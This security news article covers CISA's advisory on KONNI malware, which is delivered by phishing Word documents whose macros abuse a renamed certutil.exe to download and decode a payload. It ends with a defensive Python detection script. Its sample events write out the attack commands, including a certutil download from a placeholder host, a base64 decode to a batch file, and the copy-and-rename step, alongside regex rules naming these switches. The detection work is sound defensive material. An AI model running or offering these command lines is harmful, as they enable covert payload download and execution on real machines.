The Cybersecurity and Infrastructure Security Agency (CISA) advised users to be wary of an email attachment containing a malicious Microsoft Word document that’s used to deploy KONNI malware.
Phishing is one of the main methods attackers use to spread malware, and there is a solid reason for that: it requires little technical expertise. Instead of breaking through network defenses or security products, the attacker relies on a careless or untrained employee to open an email and its attachment without verifying where it came from.
Phishing emails usually try to trick users into visiting a website that closely mimics the legitimate one, so their credentials can be stolen. In some cases, simply visiting a website is enough to compromise an unpatched browser or device. Phishing emails also carry infected attachments, and Word documents are among the most common.
Microsoft Word supports macros, Visual Basic for Applications (VBA) code embedded in a document, which have legitimate automation uses. Attackers use the same feature to run commands and pull down further payloads without the user noticing; because Word disables macros by default, the document typically has to persuade the victim to click "Enable Content" first.
“Once the Visual Basic Application (VBA) macro constructs the command line, it uses the certificate database tool CertUtil to download remote files from a given Uniform Resource Locator,” CISA says in the advisory. “It also incorporates a built-in function to decode base64-encoded files. The Command Prompt silently copies certutil.exe into a temp directory and renames it to evade detection.”
“The cyber actor then downloads a text file from a remote resource containing a base64-encoded string that is decoded by CertUtil and saved as a batch (.BAT) file. Finally, the cyber actor deletes the text file from the temp directory and executes the .BAT file.”
Executing the batch file completes the chain by installing KONNI, a remote access trojan that the attackers use to steal files, infect other hosts on the same network, take screenshots, capture keystrokes and more.
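Added illustration, not code from CISA's advisory or from this article: a small Python routine that turns the loader behaviour described above into detection rules and runs them over constructed Sysmon-style process-creation events. Field names follow Sysmon Event ID 1 (Image, ParentImage, OriginalFileName, CommandLine); the user name, paths, file names and URL in the sample events are made up for the example. The check worth noting is OriginalFileName: a copied and renamed certutil.exe still reports CertUtil.exe from its PE version resource, so the rename itself becomes an indicator.

```python
import ntpath
import re

# Constructed Sysmon Event ID 1 style records for this example; the user name,
# paths, file names and URL are made up and are not real indicators.
SAMPLE_EVENTS = [
    {
        "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "ParentImage": r"C:\Windows\explorer.exe",
        "OriginalFileName": "WinWord.exe",
        "CommandLine": r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n "C:\Users\alice\Downloads\invoice.doc"',
    },
    {
        # The VBA macro builds a command line and hands it to cmd.exe.
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "OriginalFileName": "Cmd.Exe",
        "CommandLine": r"cmd /c copy /y C:\Windows\System32\certutil.exe C:\Users\alice\AppData\Local\Temp\svchost.exe",
    },
    {
        # The renamed copy still carries CertUtil.exe in its version resource.
        "Image": r"C:\Users\alice\AppData\Local\Temp\svchost.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "OriginalFileName": "CertUtil.exe",
        "CommandLine": r"svchost.exe -urlcache -split -f http://example.invalid/payload.txt C:\Users\alice\AppData\Local\Temp\payload.txt",
    },
    {
        "Image": r"C:\Users\alice\AppData\Local\Temp\svchost.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "OriginalFileName": "CertUtil.exe",
        "CommandLine": r"svchost.exe -decode C:\Users\alice\AppData\Local\Temp\payload.txt C:\Users\alice\AppData\Local\Temp\run.bat",
    },
    {
        # Benign administrator use of certutil: must produce no hits.
        "Image": r"C:\Windows\System32\certutil.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "OriginalFileName": "CertUtil.exe",
        "CommandLine": r"certutil -hashfile C:\tools\setup.msi SHA256",
    },
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# certutil accepts its switches with either a '-' or a '/' prefix.
URLCACHE_RE = re.compile(r"[-/]urlcache\b", re.IGNORECASE)
DECODE_RE = re.compile(r"[-/]decode(hex)?\b", re.IGNORECASE)
COPY_CERTUTIL_RE = re.compile(r"\b(copy|xcopy|move)\b.*certutil\.exe", re.IGNORECASE)
TEMP_DIR_RE = re.compile(r"\\temp\\", re.IGNORECASE)

# The three indicators that together make up the loader chain described by CISA.
CHAIN = {"renamed_certutil", "certutil_download", "certutil_decode"}


def _basename(path):
    # ntpath handles Windows paths correctly even when this runs on Linux.
    return ntpath.basename(path).lower()


def match_rules(event):
    """Return the names of the loader indicators that this single event matches."""
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    original = event.get("OriginalFileName", "").lower()
    cmdline = event.get("CommandLine", "")
    hits = []
    if image in SHELLS and parent in OFFICE_APPS:
        hits.append("office_spawned_shell")
    if image in SHELLS and COPY_CERTUTIL_RE.search(cmdline):
        hits.append("certutil_copied")
    if original == "certutil.exe":
        if image != "certutil.exe":
            hits.append("renamed_certutil")
        if URLCACHE_RE.search(cmdline):
            hits.append("certutil_download")
        if DECODE_RE.search(cmdline):
            hits.append("certutil_decode")
        if TEMP_DIR_RE.search(event.get("Image", "")):
            hits.append("certutil_in_temp")
    return hits


def find_suspicious(events):
    """Map event index -> matched rules, keeping only events with at least one hit."""
    result = {}
    for i, event in enumerate(events):
        hits = match_rules(event)
        if hits:
            result[i] = hits
    return result


def konni_style_chain(events):
    """True when a renamed certutil both downloaded and decoded something in this batch."""
    seen = set()
    for hits in find_suspicious(events).values():
        seen.update(hits)
    return CHAIN <= seen


if __name__ == "__main__":
    for i, hits in find_suspicious(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i]["CommandLine"][:60], hits)
    print("loader chain present:", konni_style_chain(SAMPLE_EVENTS))
```

Run directly, it prints the three matching events and reports that the full chain is present. The benign hashfile invocation is there to show why the rules key on the rename, the temp-directory location and the download/decode switches rather than on certutil.exe alone, which would page an analyst every time an administrator verifies a checksum; in production the same logic belongs in the SIEM's query language.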
Protection against this kind of attack comes down to basics: keep an up-to-date security solution installed, never open attachments from unknown senders, and keep Office macros disabled by default, which means not clicking "Enable Content" on a document you were not expecting. Because the chain relies on a built-in Windows tool rather than a custom downloader, monitoring for certutil.exe being copied or renamed, or run with download and decode options from a temp directory, is a worthwhile detection on top of those preventive measures.